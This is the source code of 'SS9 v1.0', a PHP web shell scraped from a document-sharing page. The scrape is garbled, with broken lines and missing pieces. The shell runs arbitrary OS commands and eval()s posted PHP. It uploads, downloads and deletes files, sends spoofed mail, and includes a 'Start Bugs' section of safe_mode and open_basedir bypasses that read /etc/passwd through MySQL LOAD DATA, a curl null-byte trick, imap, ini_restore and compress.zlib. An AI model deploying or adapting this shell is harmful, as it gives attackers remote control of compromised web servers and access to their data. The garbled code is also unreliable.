Documente Academic
Documente Profesional
Documente Cultură
php
/*##############################################################################
#############*\
|#+----------------------------------------------------------------------------------------+#|
|*#
#*|
|*#
@@@
@@@
@@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
#*|
|*#
@@
@@
@@@ @@
#*|
|*#
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@
@@
@@
@@
@@
@@
#*|
|*#
@@@
@@@
@@@
#*|
|*#
#*|
|#+----------------------------------------------------------------------------------------+#|
\*##############################################################################
#############*/
/*##########################################*\
|#+----------------------------------------+#|
|#+ Script : SS9 v 1.0 (phpshell)
+#|
|#+ (C)oded By : ServeR00T
+#|
|#+ Last Modify : 04/07/2008
+#|
|#+ Email : inlove.511[at]gmail[com]
+#|
|#+----------------------------------------+#|
\*##########################################*/
// $login['use'] = 1; no. 1 for enable this trait.
// $login['use'] = 0; no. 0 for disable this trait.
$login['use'] = 0;
// username and password crypt with md5()
// default username and password '8bf0abc0c4d5c9abb79cd816e4a545bd' is 'ss9'
$login['user'] = "8bf0abc0c4d5c9abb79cd816e4a545bd"; // username
$login['pass'] = "8bf0abc0c4d5c9abb79cd816e4a545bd"; // password
############### MySQL Settings ###############
$mysql['host'] = "localhost";
$mysql['user'] = "username";
$mysql['pass'] = "password";
$mysql['db'] = "database";
##############################################
############### Security Shell ###############
if ($login['use'] == 1)
{
if (!isset($_SERVER['PHP_AUTH_USER']) or md5($_SERVER['PHP_AUTH_
USER']) != $login['user'] or md5($_SERVER['PHP_AUTH_PW']) != $login['pass'])
{
header('WWW-Authenticate: Basic realm="This File is Secu
red :>"');
header('HTTP/1.0 401 Unauthorized');
exit("<br><br><br><br><p align='center'><font face='Taho
ma' size='2'><b>You Don't Have Access To Read This File.</b></font></p>");
}
}
ob_start();
error_reporting(7);
if (fetch_env('register_globals') != 1)
{
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
if (get_magic_quotes_gpc())
{
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
############### Set Variables ################
$pwd
= getcwd();
$dis_func
= fetch_env("disable_functions");
$safe_mode
= fetch_env('safe_mode');
$safemode
= ($safe_mode == "on" or strtolower($safe_mode) == "on") ?
'<font color="red">ON (Secured)</font>' : '<font color="green">OFF (Not Secured
)</font>';
$danger_files = array("config.php", "config.inc.php", "connect.php", "my
sql.php", "connectmysql.php", "info.php", "info.inc.php");
$tb
= new FORMS;
################ Delete Self #################
if ($_GET['act'] == "delete")
{
@unlink(__FILE__);
}
################### About ####################
if ($_GET['act'] == "about")
{
doheader();
msg('<div align="left" style="font-size: 13px"><font face="lucid
a console"><br>
/*##############################################################################
#############*\
|#+----------------------------------------------------------------------------------------#*|
|*#  
; &
nbsp; &nb
sp;  
; &
nbsp; &nb
sp; #*|
|*#  
; &
nbsp; @@@
@@@ @@@&n
bsp; &nbs
p;
#*|
|*#  
; @
@ @@ @@ &nb
sp; @@ @@ @
@ &
nbsp; #*|
|*#  
; @
@ @@ @@ &nb
sp; @@ @@ @
@ &
nbsp; #*|
|*#  
; &
nbsp;@@ @
@ @@  
; @@  
; &
nbsp; #*|
|*#  
; &
nbsp; @@ &
nbsp; @@ &
nbsp;@@@ @@ &nbs
p;
#*|
|*#  
; &
nbsp; @@ &
nbsp; @@ &
nbsp; @@ &
nbsp; &nb
sp; #*|
|*#  
; @
@ @@ @@ &nb
sp; @@ @@ @
@ &
nbsp; #*|
|*#  
; @
@ @@ @@ &nb
sp; @@ @@ @
@ &
nbsp; #*|
|*#  
; &
nbsp; @@@
@@@ @@@&n
bsp; &nbs
p;
#*|
|*#  
; &
nbsp; &nb
sp;  
; &
nbsp; &nb
sp; #*|
|*#----------------------------------------------------------------------------------------#*|
|*##############################################################################
#############*|
|*#----------------------------------------------------------------------------------------#*|
|*# Script : SS9 v 1.0 (phpshell)  
; &
nbsp; &nb
sp;  
; &
nbsp; #*|
|*# (C)oded By : ServeR00T &nbs
p;
&n
bsp; &nbs
p;
#*|
|*# Last Modify : 03/07/2008 &n
bsp; &nbs
p;
&n
bsp; &nbs
p; #*|
|*# Email : inlove.511[at]gmail[com]  
; &
nbsp; &nb
sp;  
; #*|
|*#----------------------------------------------------------------------------------------+*|
\*##############################################################################
#############*/
</font></div>');
dofooter();
exit;
}
################## PHPinfo ###################
if ($_GET['act'] == "phpinfo")
{
echo $phpinfo = (!eregi("phpinfo",$dis_func)) ? phpinfo() : "<ce
nter>phpinfo()</center>";
exit;
}
################## Command ###################
if ($_GET['act'] == "cmd")
{
doheader();
if (substr(PHP_OS, 0, 3) == 'WIN')
{
$program = isset($_POST['program']) ? $_POST['program']
: $_SERVER['COMSPEC'];
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net
</td>
</tr>
</table>");
dofooter();
exit;
}
#################### Eval ####################
if ($_GET['act'] == 'eval')
{
if (isset($_POST['code']))
{
eval($_POST['code']);
exit;
}
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Eval :</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=eval" method="POST">
<tr class="secondalt">
<td align="center">
<textarea name="code" cols="90" rows="20">Code Here</tex
tarea><br>
<input type="submit" class="input" name="submit" value="
eval code">
</td>
</tr>
</table>');
dofooter();
exit;
}
################## Send Mail #################
if ($_GET['act'] == 'mail')
{
doheader();
if ($_GET['do'] == 'send')
{
$send = @mail($_POST['to'],$_POST['subject'],$_POST['msg
'],"From: ".$_POST['from']."\r\n");
if ($send)
{
msg('Successfully send message.');
goto($REQUEST_URI . '?');
}
else
{
msg('Sorry, Can\'t send message.');
goto($REQUEST_URI . '?');
}
dofooter();
exit;
}
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Send Mail :</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=mail&do=send" method="POST">
<tr class="secondalt">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0">
<tr>
<td><b>From :</b></td>
</tr>
<tr>
<td><input type="text" class="input" name="from"
size="40" value="you@isp.com"></td>
</tr>
<tr>
<td><b>To :</b></td>
</tr>
<tr>
<td><input type="text" class="input" name="to" s
ize="40" value="he@isp.com"></td>
</tr>
<tr>
<td><b>Subject :</b></td>
</tr>
<tr>
<td><input type="text" class="input" name="subje
ct" size="40"></td>
</tr>
<tr>
<td><b>Message :</b></td>
</tr>
<tr>
<td><textarea name="msg" cols="90" rows="20"></t
extarea></td>
</tr>
<tr>
<td align="center"><input type="submit" class="i
nput" name="submit" value=" Send "></td>
</tr>
</table>
</td>
</tr>
</table>');
dofooter();
exit;
}
exit;
}
############### Delete File ##################
if ($_GET['act'] == 'delfile')
{
doheader();
if (@unlink($_GET['pwd'] . "/" . $_GET['file']))
{
msg('Successfully deleted!');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
else
{
msg('Sorry,don\'t deleted!');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
}
################ Download File ###############
if ($_GET['act'] == "download")
{
doheader();
$fp = fopen($_POST['downname'],"r");
if (!$fp)
{
msg('Sorry, Can\'t open this file.');
goto($REQUEST_URI . '?');
dofooter();
}
else
{
ob_clean();
$filename = basename($_POST['downname']);
$filedump = fread($fp,filesize($_POST['downname']));
fclose($fp);
$content_encoding = $mime_type = '';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding))
{
header('Content-Encoding: ' . $content_encoding)
;
}
header("Content-type: " . $mime_type);
header('Content-disposition: attachment; filename="' . $
filename . '";');
print($filedump);
dofooter();
exit;
}
}
################ Upload File #################
if ($_GET['act'] == 'upload')
{
doheader();
if (@copy($_FILES['uploadfile']['tmp_name'],$_POST['uploaddir']
. "/" . $_FILES['uploadfile']['name']))
{
msg('Done Upload File.');
goto($REQUEST_URI . "?");
}
else
{
msg('Sorry, Don\'t Upload File.');
goto($REQUEST_URI . "?");
}
dofooter();
exit;
}
################ Rename File #################
if ($_GET['act'] == 'rename')
{
doheader();
if (rename($_POST['oldname'],$_POST['newname']))
{
msg('Done Rename File.');
goto($REQUEST_URI . "?");
}
else
{
msg('Sorry, Don\'t Rename File.');
goto($REQUEST_URI . "?");
}
dofooter();
exit;
}
################## Search ####################
if ($_GET['act'] == 'search')
{
if ($_GET['do'] == 'search')
{
if ($_POST['mask'] == '1' and !empty($_POST['searchmask'
]))
{
$SR = new SearchResult($_POST['searchdir'],$_POS
T['searchtext'],$_POST['searchmask']);
}
else
{
$SR = new SearchResult($_POST['searchdir'],$_POS
T['searchtext']);
}
$SR->SearchText(0,0);
$res = $SR->GetResultFiles();
$found = $SR->GetMatchesCount();
$titles = $SR->GetTitles();
$result = css();
if ($found > 0)
{
$result .= "\n" . '<html dir="ltr">' . "\n" . '<
head>' . "\n" . css() . "\n" . '<title>SS9 v1.0 - Search</title>' . "\n" . '</he
ad>' . "\n" . '<body bgcolor="#000000"><center>' . "\n" . '<table width="775" bo
msg('Sorry,don\'t deleted!');
goto($REQUEST_URI . '?');
}
dofooter();
exit;
}
################ File Manager ################
if (!isset($_GET['act']))
{
doheader();
$pathname = str_replace('\\','/',dirname(__FILE__));
if (!isset($_GET['dir']) or empty($_GET['dir']))
{
$dir = ".";
$nowpath = getPath($pathname, $dir);
}
else
{
$dir = $_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
$tb->tableheader();
echo"<tr class='top'><td align='center' nowrap width='45%'><b>DI
R</b></td><td align='center' nowrap width='10%'><b>First Modify</b></td><td alig
n='center' nowrap width='10%'><b>Last Modify</b></td><td align='center' nowrap w
idth='10%'><b>Size</b></td><td align='center' nowrap width='10%'><b>Edit</b></td
><td align='center' nowrap width='10%'><b>Delete</b></td><td align='center' nowr
ap width='5%'><b>Perm</b></td></tr>";
$dirs = @opendir($dir);
$dir_i = 0;
while ($file = @readdir($dirs))
{
$filepath = $dir . "/" . $file;
$a = @is_dir($filepath);
if($a == "1")
{
if($file != ".." and $file != ".")
{
$ctime = @date("Y-m-d H:i:s",@filectim
e($filepath));
$mtime
= @date("Y-m-d H:i:s",@filemtim
e($filepath));
$dirperm = substr(base_convert(fileperms
($filepath),10,8),-4);
$dirperm = (substr($dirperm,1,3) == 777
or 666) ? '<font color="green">' . $dirperm . '</font>' : $dirperm;
print('<tr class="' . getrowbg() . '">')
;
echo " <td style=\"padding-left: 5px;\"
>[<a href=\"?dir=" . $dir . "/" . urlencode($file) . "\">" . $file . "</a>]</td>
";
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">' . $ctime . '</span></td>');
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">' . $mtime . '</span></td>');
p;' . $tb->makeinput('','Read','copy','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=ini_restore','content'=>$
tb->td(':: Read file with [ini_restore] ::<br>' . $tb->makeinput('file','/etc/pa
sswd') . ' ' . $tb->makeinput('','Read','M2','submit'))));
$tb->headerform1(array('action'=>'?act=imap','content'=>$tb->td(
':: Read file or dir with [imap] ::<br>' . $tb->makeimp('switch','/etc/passwd')
. ' ' . $tb->makeinput('string','/etc/passwd' ) . ' ' . $tb->makeinput
('string','Read','','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=id','content'=>$tb->td(':
: Read file with [id] ::<br>' . $tb->makeid('plugin','cat /etc/passwd') . ' 
;' . $tb->makeinput('','Read','plugin','submit'))));
$tb->headerform1(array('action'=>'?act=error','content'=>$tb->td
(':: Make file with [ERORR] ::<br>' . $tb->makeinput('ER','error.php') . '
' . $tb->makeinput('','Write','ER','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=upload&dir=' . urlencode(
$dir),'enctype'=>'multipart/form-data','content'=>$tb->td(':: Upload file ::<br>
'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','Uploa
d','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))));
$tb->headerform1(array('action'=>'?act=mkdir','content'=>$tb->td
(':: Make directory ::<br>'.$tb->makeinput('newdirectory').' '.$tb->makeinput('c
reatedirectory','Make directory','','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=download','content'=>$tb>td(':: Download file ::<br>'.$tb->makeinput('downname',$nowpath,'','text',40).'
<br>'.$tb->makeinput('compress','none','checked','radio','','').' without archiv
e '.((@function_exists('gzcompress')) ? $tb->makeinput('compress','zip','','radi
o','','').' zip' : '').' '.((@function_exists('gzencode')) ? $tb->makeinput('com
press','gzip','','radio','','').' gzip': '').' '.((@function_exists('bzcompress'
)) ? $tb->makeinput('compress','bzip','','radio','','').' bzip' : '').'<br>'.$tb
->makeinput('download','Download','','submit'))));
$tb->headerform1(array('action'=>'?act=rename','content'=>$tb->t
d(':: Rename file ::<br>'.$tb->makeinput('oldname','Old name','','','15').' '.$t
b->makeinput('newname','New name','','','15').' '.$tb->makeinput('renamefile','R
ename','','submit'))));
print('</table></table>');
dofooter();
}
################# Start Bugs #################
############### Read File SQL() ##############
if ($_GET['act'] == 'readsql')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [SQL]: ' . $_POST['sql'] . '</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$file = $_POST['sql'];
$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/
etc/proftpd.conf";
$mysql_files = explode(':', $mysql_files_str);
$sql = array("USE " . $mysql['db'], 'CREATE TEMPORARY TABLE ' .
($tbl = 'A' . time()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '" . $file . "'
INTO TABLE " . $tbl . " FIELDS " . "TERMINATED BY
'__THIS_NEVER_HAPPENS__
' " . "ESCAPED BY
'' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"
, "SELECT a FROM " . $tbl . " LIMIT 1");
mysql_connect($mysql['host'], $mysql['user'], $mysql['pass']);
foreach ($sql as $statement)
{
$q = mysql_query($statement);
if ($q == false) die ("FAILED: " . $statement . "REASON:
" . mysql_error());
if (!$r = @mysql_fetch_array($q, MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result($q);
}
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### ERROR ###################
if ($_GET['act'] == 'error')
{
doheader();
$ERORR = $_POST['ER'];
print(error_log('<html>
<head>
<title>SS9 v1.0 [exploit error_log()]</title>
</head>
<body bgcolor="#000000">
<center>
<table Width="100%" height="10%" bgcolor="#222222" border="1">
<tr>
<td><center><font size="6" color="#cccccc">Exploit error_log() function</font></
center></td>
</tr>
</table>
<font color="#FF0000">
<?
if (isset($_POST["fileup"]))
{
$path = exec("pwd");
$path .= "/" . $fileup_name;
if (copy($fileup,$path))
{
if (!empty($ara))
{
while (list ($key, $val) = each($ara))
{
print($val . ":");
}
}
}
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### CURL ####################
if ($_GET['act'] == 'curl')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [CURL]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$curl = $_POST['curl'];
$ch = curl_init("file:///" . $curl . "\x00/../../../../../../../
../../../../../" . __FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### copy ####################
if ($_GET['act'] == 'copy')
{
$copy = $_POST['copy'];
$temp = tempnam("", "cx");
if (file_exists($copy))
{
if (copy("compress.zlib://" . $copy, $temp))
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [copy]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$fp = fopen($temp, "r");
$fr = fread($fp, filesize($temp));
fclose($fp);
print(htmlspecialchars($fr));
unlink($temp);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
else
{
doheader();
msg('Sorry, File <B>' . htmlspecialchars($copy)
. '</B> you don\'t have access to it.');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
}
else
{
doheader();
msg('Sorry, File <B>' . htmlspecialchars($copy) . '</B>
dosen\'t exists.');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
}
################ ini_restore #################
if ($_GET['act'] == 'ini_restore')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [ini_restore]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$file = $_POST['file'];
print(fetch_env("safe_mode"));
print(fetch_env("open_basedir"));
$s = readfile($file);
ini_restore("safe_mode");
ini_restore("open_basedir");
print(fetch_env("safe_mode"));
print(fetch_env("open_basedir"));
print $s = readfile($file);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### imap ####################
if ($_GET['act'] == 'imap')
{
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string and $switch == "file")
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [imap]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$stream = imap_open($string, "", "");
$str = imap_body($stream, 1);
if (!empty($str))
{
print("<pre>" . $str . "</pre>");
}
imap_close($stream);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
elseif ($string and $switch == "dir")
{
doheader();
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
{
msg("Can't open imap stream");
dofooter();
exit;
}
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read dir [imap]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$string = explode("|",$string);
if (count($string) > 1)
{
$dir_list = imap_list($stream, trim($string[0]),
trim($string[1]));
}
else
{
$dir_list = imap_list($stream, trim($string[0]),
"*");
}
print("<pre>");
for ($i = 0; $i < count($dir_list); $i++)
{
print($dir_list[$i] . "<p> </p>");
}
print("</pre>");
imap_close($stream);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
}
############### Start Functions ##############
class SearchResult
{
var $text;
var $FilesToSearch;
var $ResultFiles;
var $FilesTotal;
var $MatchesCount;
var $FileMatschesCount;
var $TimeStart;
var $TimeTotal;
var $titles;
function SearchResult($dir,$text,$filter='')
{
$dirs = @explode(";",$dir);
$this->FilesToSearch = Array();
for ($a = 0; $a < count($dirs); $a++)
$this->FilesToSearch = @array_merge($this->FilesToSearch
,DirFilesR($dirs[$a],$filter));
$this->text = $text;
$this->FilesTotal = @count($this->FilesToSearch);
$this->TimeStart = getmicrotime();
$this->MatchesCount = 0;
$this->ResultFiles = Array();
$this->FileMatchesCount = Array();
$this->titles = Array();
}
function GetFilesTotal()
{
return $this->FilesTotal;
}
function GetTitles()
{
return $this->titles;
}
function GetTimeTotal()
{
return $this->TimeTotal;
}
function GetMatchesCount()
{
return $this->MatchesCount;
}
function GetFileMatchesCount()
{
return $this->FileMatchesCount;
}
function GetResultFiles()
{
return $this->ResultFiles;
}
function SearchText($phrase=0,$case=0)
{
$qq = @explode(' ',$this->text);
$delim = '|';
if ($phrase)
foreach ($qq as $k=>$v)
$qq[$k] = '\b'.$v.'\b';
$words = '('.@implode($delim,$qq).')';
$pattern = "/".$words."/";
if (!$case)
$pattern .= 'i';
foreach ($this->FilesToSearch as $k=>$filename)
{
$this->FileMatchesCount[$filename] = 0;
$FileStrings = @file($filename) or @next;
for($a=0;$a<@count($FileStrings);$a++)
{
$count = 0;
$CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
$CurString = @strip_tags($CurString);
$aa = '';
if(($count = @preg_match_all($pattern,$C
urString,$aa)))
{
$CurString = @preg_replace($patt
ern,'<font color="yellow"><b>\\1</b></font>',$CurString);
$this->ResultFiles[$filename][$a
+1] = $CurString;
$this->MatchesCount += $count;
$this->FileMatchesCount[$filenam
e] += $count;
}
}
}
$this->TimeTotal = @round(getmicrotime() - $this->TimeSt
art,4);
}
}
function getmicrotime()
{
list($usec,$sec) = @explode(" ",@microtime());
return ((float)$usec + (float)$sec);
}
function DirFilesR($dir,$types='')
{
$files = Array();
if (($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if (@is_dir($dir."/".$file))
{
$files = @array_merge($files,Dir
FilesR($dir."/".$file,$types));
}
else
{
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strle
n($file)-$pos);
if ($types)
{
if(@in_array($ext,explod
e(';',$types)))
{
$files[] = $dir.
"/".$file;
}
}
else
{
$files[] = $dir."/".$fil
e;
}
}
}
}
@closedir($handle);
}
return $files;
}
class zipfile
{
var $datasec
var $ctrl_dir
var $eof_ctrl_dir
var $old_offset
=
=
=
=
array();
array();
"\x50\x4b\x05\x06\x00\x00\x00\x00";
0;
function unix2DosTime($unixtime = 0)
{
$timearray = ($unixtime == 0) ? getdate() : getdate($uni
xtime);
if ($timearray['year'] < 1980)
{
$timearray['year']
= 1980;
$timearray['mon']
= 1;
$timearray['mday']
= 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray
['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($ti
mearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name
= str_replace('\\', '/', $name);
$dtime
= dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime
[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr
$fr
$fr
$fr
$fr
$unc_len
$crc
$zdata
$zdata
= "\x50\x4b\x03\x04";
.= "\x14\x00";
.= "\x00\x00";
.= "\x08\x00";
.= $hexdtime;
= strlen($data);
= crc32($data);
= gzcompress($data);
= substr(substr($zdata, 0, strlen($zdata) - 4),
2);
$c_len = strlen($zdata);
$fr
.= pack('V', $crc);
$fr
.= pack('V', $c_len);
$fr
.= pack('V', $unc_len);
$fr
.= pack('v', strlen($name));
$fr
.= pack('v', 0);
$fr
.= $name;
$fr
.= $zdata;
$this->datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name));
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this->old_offset);
$this->old_offset += strlen($fr);
$cdrec .= $name;
$this->ctrl_dir[] = $cdrec;
}
function file()
{
$data
= implode('', $this->datasec);
$ctrldir = implode('', $this->ctrl_dir);
return $data . $ctrldir . $this->eof_ctrl_dir . pack('v'
, sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strl
en($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding,$mime_type;
if ($compress == 'bzip' and @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
elseif ($compress == 'gzip' and @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
elseif ($compress == 'zip' and @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile->addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile->file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function msg($message, $color = "white")
{
print('
<table width="775" border="0" cellpadding="3" cellspacing="0">
<tr class="td">
<td class="td"><p align="center"><font color="' . $color . '">'
. $message . '</font></p></td>
</tr>
</table>
');
}
function disksize($disk)
{
$types = Array("B","KB","MB","GB","TB");
$i = 0;
while ($disk > 1024)
{
$i++;
$disk /= 1024;
}
return round($disk,2) . " " . $types[$i];
}
function size($file)
{
$types = Array("B","KB","MB","GB","TB");
$bytes = filesize($file);
if (!$bytes)
{
return 0;
}
else
{
$i = 0;
while ($bytes > 1024)
{
$i++;
$bytes /= 1024;
}
class FORMS
{
function tableheader()
{
print('<table width="775" border="0" cellpadding="3" cel
lspacing="1" bgcolor="#ffffff">');
}
function headerform($arg = array())
{
global $dir;
if ($arg['enctype'])
{
$enctype = 'enctype="' . $arg['enctype'] . '"';
}
else
{
$enctype = "";
}
if (!isset($arg['method']))
{
$arg['method'] = "POST";
}
if (!isset($arg['action']))
{
$arg['action'] = "";
}
print('<form action="' . $arg['action'] . '" method="' .
$arg['method'] . '" ' . $enctype . '><tr><td>' . $arg['content'] . '</td></tr><
/form>');
}
function headerform2($arg = array())
{
return $arg['content'];
}
function headerform1($arg = array())
{
global $dir;
if ($arg['enctype'])
{
$enctype = 'enctype="' . $arg['enctype'] . '"';
}
else
{
$enctype = "";
}
if (!isset($arg['method']))
{
$arg['method'] = "POST";
}
if (!isset($arg['action']))
{
$arg['action'] = "";
}
print('<form action="' . $arg['action'] . '" method="' .
$arg['method'] . '" ' . $enctype . '>' . $arg['content'] . '</form>');
}
function tdheader($title)
{
global $dir, $REQUEST_URI;
print('<tr class="firstalt"><td align="center"><b>' . $t
itle . '</b></td></tr>');
}
function tdbody($content,$align = 'center',$bgcolor = '2',$heigh
t = '',$extra = '',$colspan = '')
{
if ($bgcolor == '2')
{
$css = "secondalt";
}
elseif ($bgcolor == '1')
{
$css = "firstalt";
}
else
{
$css = $bgcolor;
}
$height = empty($height) ? "" : " height=" . $height;
$colspan = empty($colspan) ? "" : " colspan=" . $colspan
;
print('<tr class="' . $css . '"><td align="' . $align .
'"' . $height . $colspan . ' ' . $extra . '>' . $content . '</td></tr>');
}
function tablefooter()
{
print("</table>");
}
function td($content, $width = '50%', $class = 'td')
{
$result = '<td align="center" width="' . $width . '" cla
ss="' . $class . '">' . $content . '</td>';
return $result;
}
function makehidden($name,$value = '')
{
print('<input type="hidden" name="' . $name . '" value="
' . $value . '">');
}
function makeinput($name,$value = '',$extra = '',$type = 'text',
$size = '30',$css = 'input')
{
$css = ($css == 'input') ? ' class="input"' : ' style="'
. $css . '"';
}
elseif (is_array($arg['selected']))
{
if ($arg['selected'][$key] == 1)
{
$select .= '<option valu
e="' . $key . '" selected>' . $value . '</option>';
}
else
{
$select .= '<option valu
e="' . $key . '">' . $value . '</option>';
}
}
}
}
$select .= "</select>";
return $select;
}
}
function doheader()
{
global $pwd, $safe_mode, $safemode, $dis_func;
print('<html dir="ltr">
<head>
<title>SS9 v1.0</title>
' . css() . '
<SCRIPT language="JavaScript">
function CheckAll(form)
{
for (var i = 0; i < form.elements.length; i++)
{
var e = form.elements[i];
if (e.name != "chkall")
e.checked = form.chkall.checked;
}
}
function really(d,f,m,t)
{
if (confirm(m))
{
if (t == 1)
{
window.location.href = "?dir=" + d + "&deldir=" + f;
}
else
{
window.location.href = "?dir=" + d + "&delfile=" + f;
}
}
}
</SCRIPT>
</head>
<body bgcolor="#000000" topmargin="0" leftmargin="0" bottommargin="0" rightmargi
n="0">
<center>
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<!-- start header -->
bgcolor="#
cellspacin
Upload fil
cellspacin
g="0">
<tr>
<td width="50%">' . $content1 . '</td>
<td width="50%">' . $content2 . '</td>
</tr>
<tr>
<td width="50%">' . $content3 . '</td>
<td width="50%">' . $content4 . '</td>
</tr>
</table>
</td>
</tr>
</table>');
}
function fetch_env($name)
{
if (function_exists('ini_get'))
{
return ini_get($name);
}
else
{
return get_cfg_var($name);
}
}
function goto($url, $seconds = 2)
{
print('<meta http-equiv="refresh" content="' . $seconds . '; url
=' . $url . '">');
}
function css()
{
return '<style type="text/css">
body, td
{
font-family: Tahoma;
font-size: 11px;
color: #ffffff;
line-height: 150%;
margin-top: 0;
margin-left: 0;
margin-bottom: 0;
margin-right: 0;
}
.smlfont
{
font-family: Tahoma;
